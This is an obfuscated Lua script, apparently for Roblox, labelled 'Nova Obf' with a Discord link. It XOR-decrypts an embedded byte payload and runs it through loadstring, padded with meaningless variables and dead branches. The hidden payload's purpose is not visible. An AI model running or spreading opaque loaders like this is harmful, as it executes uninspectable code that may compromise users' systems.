
--[[ 
 Nova Obf 
 
 Discord: https://discord.gg/EUh47Dkc4X 
 ]]--

local hUHvMM = 32880
local feoJXW = 97813
local ktCrAZ = 16488
local PVmNcQ = 65104
local mStOzY = 72625
if hUHvMM == 97871 then
    hUHvMM = feoJXW - 1
end
if hUHvMM == 9411 then
    hUHvMM = mStOzY - 1
end
if hUHvMM == 38840 then
    hUHvMM = PVmNcQ - 1
end
if mStOzY == 13107 then
    mStOzY = PVmNcQ - 1
end
if mStOzY == 86971 then
    mStOzY = ktCrAZ - 1
end
if hUHvMM == 68305 then
    hUHvMM = hUHvMM + 1
end
if hUHvMM == 51333 then
    hUHvMM = feoJXW - 1
end
if mStOzY == 3084 then
    mStOzY = mStOzY + 1
end
if feoJXW == 68190 then
    feoJXW = feoJXW + 1
end
if PVmNcQ == 59148 then
    PVmNcQ = feoJXW - 1
end

local izjayq = {
    "\x97\x59\xe1\x13\xe2\x0a\x50\xa6\x12\x17\xf3\xf0\x1c\xfe\xfe\xaf\x7c\xd8\xe1\x34\xc8\x01\x5c\xb8\xc4\x14\x15\x5b\xf2\xb7\x27\xdc\xe2\x4d\xbb\x4d\x9a\x75\xea\xd9\xe0\x13\xe2\x0a\x50\xb3\x39\xeb\xdb\x55\xf7\xe2\xd7\x27\xdc\xe2\x6e\xf2\xe5\x8b\x17\x22\x1f\xec\x1d\xf5\xaf\x6d\xc0\x1d\xd9\x44\x95\x1e\x27\xfe\x88\x2b\x16\x6c\x98\x37\xe7\x02\x52\x8c\x01\x03\x22\x57\xf3\xe2\x94\x16\x70\xe3\xcc\x3c\xf7\xd2\x58\xb4\xea\x7a\xca\x95\x6b\x96\x6d\x9a\x75\xea\xd9\xe0\x13\xe2\x0a\x50\x99\x02\x35\xc6\x78\xed\x9e",
    "\x2e\xff\xf9\xec\x1c\xe9\x56\xac\x02\x09\xe3\x42\xc4\x3c\xf7\xd2\x54\xec\xf1\xfb\xf6\xe9\xa4\x0d\x72\xfc\xf8\xd5\x51\xc3\xad\x1b\x76\xec\x99\x73\xe6\x8d\x16\x7c\xed\xeb\xc8\x1c\xf5\xef\x1d\xfd\xfd\xe3\x06\x16\xab\x76\xc1\x08\x18\xfd\xe4\x06\x10\xe5\x54\xe2\x8d\x51\xfd\xf6\x1c\xb5\x66\x91\x28\x0e\x00\x50\xe9\x96\x6a\x86\x0e\x7c\xe5\xdf\xe4\x50\xa4\x00\x06\x19\xfd\xf2\x01\x7c\xd2\xe5\x8b\x17\x6e\x9c\x79\xf2\xe8\x83\x12\x17\x34\xaf\x48\xe2\x4a\xd9\xfb\xf9\xf0\x55\xaf\x14\xed\x0e\xf3\x0e\xf8\xa5\x5c",
    "\xee\x02\x10\xa8\x19\x28\x0b\x09\xe3\x4a\x9f\x74\xa3\x09\x0c\xa8\x0a\x11\x65\x98\x76\x8c\x4c\xb2\x65\x8a\x15\x6a\x94\x69\x92\x29\x01\x0c\x1a\xf9\xaf\x4d\xac\x04\x1d\x72\x95\x3a\xf5\xc5\x78\xfd\xee\x95\x20\x3e\xf7\xeb\xb5\x6e\x99\x61\x81\x03\x10\x60\x89\x16\x69\x80\x06\x0c\x4f\xb4\x69\x92\x65\x8a\x15\x6a\x94\x43\xac\x19\x72\xe4\x89\x13\x66\x8c\x14\x60\x8d\x69\xcb\x04\x15\xfd\xe2\x4a\xdf\xf1\xff\xa6\x05\x7e\xf3\xe3\xa1\x20\x6a\x94\x69\x92\x65\x8a\x15\x6a\xc7\x31\xeb\xdb\x55\xf7\xe2\x8d\x40\x3e\xf7",
    "\xeb\xb5\x61\x8c\x08\x77\x8e\x73\x8f\x78\xf7\x9a\x7e\xf3\xf6\x8e\x7c\xfa\xfd\xf2\x81\x05\x0e\x79\xea\x8e\x18\x75\xfe\xfb\xfc\xf6\x80\x0c\x71\x85\x04\x77\xb2\x4b\x96\x6d\x9a\x75\xea\x95\x6b\xbc\x53\xe6\x8d\x1b\x76\xec\x99\x73\xaf\x10\xa6\x59\xe7\x0c\x16\xf5\xa8\x4c\x09\xe1\x07\x19\xe3\x4a\xc0\x1d\xf7\xe4\x65\xf4\xe9\x93\x67\x8e\x1d\x7a\xf4\xe9\x93\x67\x8e\x6f\xc0\x1d\xd9\x3f\xeb\xdf\x3e\xda\xd5\x7e\xe1\x9e\x2e\xff\xf9\xec\x1c\xe9\x56\xad\x14\xf1\xf0\x5b\xbc\xa2\x24\x72\xe4\x89\x13\x66\x8c\x19\x72",
    "\xa1\x0a\x03\x16\x83\x2d\x1a\x74\xe8\x91\x63\x86\x0d\x1a\x74\xe8\x91\x37\x1b\xf7\xe1\x0a\x57\xb9\xe4\x1c\xee\x08\xf6\x51\x98\x0f\x02\x27\xb7\x73\xb5\x08\xf6\x12\xe3\x16\xa9\x52\xeb\x0e\x0f\xa4\x43\x5d\xf8\xc0\xab\x17\x6e\x9c\x79\xf2\xe5\x8b\x52\xe7\x15\x8c\x33\x66\x8c\x19\x37\xe7\x15\x8c\x33\x66\x8c\x19\x20\x17\xfd\xf2\x08\xec\x4f\xca\xe8\x10\xee\x14\xab\x52\xec\x1e\xed\x1d\xed\xaf\x65\xf0\xfd\xd8\x4d\xbb\x08\x1b\xf4\x8f\x1f\x58\xe3\x13\xe2\x0a\x50\xa6\x12\x17\xf3\xf0\x1c\xfe\xfe\xaf\x50\xfd\xff",
    "\xfc\xde\x2e\xbf\x7e\xf5\xa7\x1c\xec\x1d\xf5\xaf\x59\xed\xe8\x0c\x0f\xe3\x01\x01\x50\xa3\x4c\xd6\xae\x16\x25\x17\xa8\x57\xa8\x50\xef\x15\xa6\x49\x13\xeb\x00\x12\xa7\x4e\x13\xf4\xa5\x4f\x1f\xfb\xe0\x11\xa9\x56\xe2\x1e\xe1\x04\x08\x19\xaf\x4b\xe2\x08\x1b\xb0\x2d\x01\x0c\x1a\xf9\xaf\x56\xb5\x76\xe1\xc7\x0e\x1b\xe1\x11\xa9\x56\xe2\x1e\xe1\x04\x08\x19\xa7\x51\xa1\x0a\x5d\xf7\xa9\x5a\xa3\x46\x1f\xf7\xfa\xa9\x4d\xbd\x1e\x1f\x18\xe6\x38\xd0\xf1\x5d\xf0\x9f\x1b\x49\xa4\x4e\x96\x71\xfb\x8e\x7d\xfd\xf9\xf5",
    "\x91\x6a\xd5\xe4\x0b\x5a\xbd\xbc\x38\xef\x16\xf9\xa7\x51\xbd\x1e\x1f\x18\xe6\x38\xd0\xf1\x5d\xf0\x9f\x1b\x1d\xa9\x19\x26\xb5\x0c\x1a\x18\x1b\xa5\x1b\x78\xec\x8e\x7d\xf0\x8f\x75\x83\x16\x75\xab\x18\xea\x59\xbb\xa0\x58\xef\x16\xf9\xa7\x51\xbd\x1e\x1f\x18\xe6\x38\xd0\xf1\x5d\xf0\x9f\x1b\x47\xf7\xe1\xe7\xb6\x0a\x14\x24\xb7\x0d\x19\x26\xb0\x06\x19\x78\xec\x8a\x7d\xf8\x82\x0a\x70\x9e\x76\xb8\xed\x16\xe7\x51\xab\x08\x56\xab\x19\xfc\xeb\x5a\xb5\xe4\x0b\x5a\xb3\xe9\x1f\xf4\xa8\x7c\xc3\x1a\xfd\xe3\x04\x18",
    "\xe9\x51\xb6\x11\xef\x14\xae\x5a\xf6\xe3\x17\xb3\x6e\xc3\x1a\xfd\xe3\x04\x18\xe9\x59\xe3\x8e\x58\xf9\xfc\xe9\x56\xbb\xe0\x00\x05\x0b\x59\xa6\x0b\xf1\x13\xa9\x57\xe5\x50\xa5\x08\x0a\x58\xb5\xe8\x0b\x5a\xb1\xe8\x0b\x5a\xb1\xe8\x0b\x5a\xb1\xe8\x0b\x5a\xb7\xa4\x5d\xe1\x11\xe5\x14\x0f\xf8\xea\x00\x09\x5e\xee\xe4\xca\x5c\xbc\xe2\x11\xe5\x4e\x8e\x64\xcb\x5c\xb7\xed\x02\x1e\xf3\xe4\x19\xa1\x11\x1b\x3f\xf3\xa9\x40\x10\xf1\x1c\xe1\x07\x5a\xa0\x1d\xf7\xe4\x4f\xcd\xef\x0e\xe3\x1e\xf8\xab\x61\xf3\xf4\x1e\xf7",
    "\xe5\x57\xf3\xe2\xcb\x18\xe5\x4f\xdb\xf4\xeb\x5b\xf6\xa4\x14\xa6\x41\x01\x0e\x19\xe5\x08\xf6\x12\xe3\x16\xa7\x5b\xe2\x08\x1b\xb0\x31\x11\xe2\x0a\x1c\xa4\x5d\xe1\x11\xe5\x14\x0f\xf8\xea\x00\x09\x5b\xf2\x86\x2f\x0e\xcb\x37\xfe\xa3\x0d\x60\xe4\xe5\x06\x31\xe6\xb1\x07\x62\xd8\x1f\xfc\xc9\x27\xb3\x5f\xc5\x27\xbf\x70\xea\xd9\x4f\xf8\x9f\x1b\x4b\xf1\xe7\xdb\x1d\xaf\x10\x24\xb8\x5f\xc4\x25\xb6\x0b\x18\x24\xb9\x08\x1e\x18\x4c\xf0\xe9\xe7\xb0\x0f\x65\x80\x0d\x09\x74\x84\x05\x75\x86\x14\x78\xe9\xd6\xe4\x0b",
    "\x5a\xbd\xf4\xa7\x5b\xeb\x05\x10\xab\x56\xe3\x15\xa6\x59\xe7\x1d\xe0\x42\xdd\xfc\xe8\x05\x19\xb0\x35\x1e\xf1\xe8\x4f\xca\xe8\x01\x18\xa5\x42\x03\x17\xfa\xe6\x47\xd0\xf2\x14\xed\x08\xed\x1d\xe1\x59\xe3\x8e\x4a\xef\x1e\xf9\xea\x5a\xa0\x07\x09\xe0\x46\xc8\x1a\xaf\x56\xf3\xa9\x47\x1b\xe6\x17\xb3\x26\x03\x14\xa4\x5d\xe7\x1d\xe0\x42\xd9\xe9\x1b\xf9\xa7\x5b\xe2\x08\x1b\xb0\x35\x17\xfe\xe7\x5a\xb9\xe9\x1b\xf9\xaf\x02\x10\x69\xd7\xe4\x0b\x5a\xbd\xf4\xa7\x4b\x1f\xfb\xe0\x11\xa7\x4e\x13\xf4\xa5\x4f\x1f\xfb",
    "\xe0\x11\xa9\x56\xe2\x1e\xe1\x04\x08\x19\xaf\x4b\xe2\x08\x1b\xb0\x2d\x01\x0c\x1a\xf9\xaf\x4c\xa7\x13\x2f\x55\xf7\xe2\xd5\x18\xf2\xea\x1d\xa6\x51\xe3\x08\x07\x1e\xb9\x36\xe2\x1e\xe1\x04\x08\x19\xa3\x13\x32\x19\xe2\x1f\xbd\x26\x16\xe4\x06\x51\xe9\xda\xe8\x57\xbd\xac\x58\xff\xf5\xa7\x46\x55\xab\x18\xea\x59\xbb\xa0\x58\xef\x16\xf9\xa7\x51\xbd\x1e\x1f\x18\xe6\x38\xd0\xf1\x5d\xf0\x9f\x1b\x1a\xad\x64\x86\x11\x76\x89\x71\x84\x0d\x73\x91\x6a\xd5\xe4\x0b\x5a\xbd\xbc\x38\xef\x16\xf9\xa7\x51\xbd\x1e\x1f\x18",
    "\xe6\x38\xd0\xf1\x5d\xf0\x9f\x1b\x47\xf2\xe4\xe5\xe1\x57\xe0\xe5\xe6\x58\xe0\x8f\x13\x70\x87\x0f\x7e\xfa\xf6\x94\x72\xb0\x1d\xf7\xe4\x4f\xd7\xf0\xa7\x5c\xe8\x06\x13\xfd\xff\xab\x43\x12\xe9\x18\xae\x4e\xe8\x06\x13\xfd\xff\xb1\x79\xd3\xf9\xf0\x07\x13\xf6\xae\x1c\x71\xa7\x04\x0a\x58\xa2\x16\xfd\xf2\x08\xec\x4f\xdb\xf4\xeb\x5b\xb3\xe4\x0b\x5a\xb1\xe8\x0b\x5a\xb1\xe8\x0b\x53\xed\xde\xf4\xeb\x5b\xb3\xe4\x0b\x5a\xbb\xe2\x01\x05\x2d\xe1\xa0\x00\x09\x5e\xff\xf1\xe6\x1a\xf7\x09\xed\x1c\xe9\x50\xaf\x19\xfc",
    "\xeb\x40\xf2\xd9\xf3\x0b\xc1\x2d\x01\x5e\x97\x0f\x0e\xcb\x37\xfe\xa3\x0d\x60\xe4\xb9\x08\x1f\x1a\x4f\xfd\x95\x27\xb4\x08\x1f\x1a\x19\xad\x1f\x1a\x19\xa4\x66\xd8\x41\x8c\x1b\x1a\x4e\xfa\x99\x27\xe0\x54\xe7\xdb\x4d\xfd\x96\x19\x43\x89\x1b\x1a\x18\xf6\xd7\x1b\x4f\xf8\x9a\x19\x43\xd8\xca\x19\x48\xfa\xe1\xe7\xe2\x5c\x9a\x19\x4f\xf9\x9f\x1b\x46\xf2\xeb\xdb\x47\xf4\xe7\xdb\x48\xf0\xe4\xe5\xe6\x52\xe0\xe5\xb7\x08\x1f\x1a\x1e\xab\x1a\x18\x49\xa0\x3e\xd8\x41\xd9\xc8\x25\xe7\x09\x2f\xda\x45\xf3\xea\xd9\x18",
    "\xab\x63\xda\x4c\xad\x2b\xda\x45\xf2\xe9\xe7\xe5\x0c\x25\xe6\xe6\x0a\x2a\xd8\x18\xf2\xa6\x07\x12\x72\x8f\x71\x8e\x70\x84\x12\x64\x98\x62\x85"
}

local BmutaQ = 67631
local MLwpgW = 75796
local nwuhUS = 16555
local SBIpWw = 1745
local LvbLkz = 68611
if nwuhUS == 87774 then
    nwuhUS = MLwpgW + 1
end
if BmutaQ == 92747 then
    BmutaQ = BmutaQ + 1
end
if BmutaQ == 99152 then
    BmutaQ = BmutaQ - 1
end
if nwuhUS == 28743 then
    nwuhUS = BmutaQ - 1
end
if SBIpWw == 4932 then
    SBIpWw = MLwpgW - 1
end

local TozxPK = table.concat(izjayq)
local lCtuxj = (table.create and table.create(#TozxPK)) or {}
local HtZMHr = 0
local fCgBLr = 1
local HdpFjv = ""

local rTXqVl = 36
    rTXqVl = (rTXqVl + 50) % 255
    rTXqVl = (rTXqVl - 2) % 255
    rTXqVl = (rTXqVl - 48) % 255
    rTXqVl = (rTXqVl - 4) % 255
    rTXqVl = (rTXqVl + 31) % 255
    rTXqVl = (rTXqVl + 10) % 255
    rTXqVl = (rTXqVl - 8) % 255
    rTXqVl = (rTXqVl + 42) % 255
    rTXqVl = (rTXqVl + (42 + 8)) % 255


local ZSshEn = 67554
local FzSiSM = 4856
local DeDYFB = 39537
local eKILgt = 97238
local rRPswu = 53286
if eKILgt == 43648 then
    eKILgt = eKILgt + 1
end
if eKILgt == 52069 then
    eKILgt = rRPswu - 1
end
if DeDYFB == 96517 then
    DeDYFB = DeDYFB + 1
end
if ZSshEn == 39859 then
    ZSshEn = FzSiSM - 1
end
if eKILgt == 36978 then
    eKILgt = ZSshEn + 1
end

while HtZMHr ~= 999 do
    if HtZMHr == 0 then
        HtZMHr = 1
    elseif HtZMHr == 1 then
        if fCgBLr <= #TozxPK then
            HtZMHr = 2
        else
            HtZMHr = 5
        end
    elseif HtZMHr == 2 then
        local b = string.byte(TozxPK, fCgBLr, fCgBLr)
        local k = rTXqVl
        rTXqVl = (rTXqVl + b) % 255
        
        local r
        if bit32 then
            r = bit32.bxor(b, k)
        else
            r = 0
            local p = 1
            local x, y = b, k
            while x > 0 or y > 0 do
                local rx, ry = x % 2, y % 2
                if rx ~= ry then r = r + p end
                x, y, p = (x - rx) / 2, (y - ry) / 2, p * 2
            end
        end

        if table.create then
            lCtuxj[fCgBLr] = string.char(r)
        else
            table.insert(lCtuxj, string.char(r))
        end
        
        HtZMHr = 3
    elseif HtZMHr == 3 then
        fCgBLr = fCgBLr + 1
        HtZMHr = 1
        
        if fCgBLr % 1000 == 0 then
             if task and task.wait then task.wait() end
        end
    elseif HtZMHr == 5 then
        HdpFjv = table.concat(lCtuxj)
        HtZMHr = 999
    end
end

local olEsGT = 97078
local fLrWYV = 17082
local xDdDpP = 43513
local gNottR = 10068
local wTQuMq = 92425
if fLrWYV == 19573 then
    fLrWYV = xDdDpP + 1
end
if gNottR == 99727 then
    gNottR = xDdDpP + 1
end
if gNottR == 20974 then
    gNottR = xDdDpP - 1
end
if gNottR == 18925 then
    gNottR = wTQuMq + 1
end
if xDdDpP == 82002 then
    xDdDpP = olEsGT - 1
end

local _func = loadstring(HdpFjv)
if _func then
    HdpFjv = nil
    _func()
end
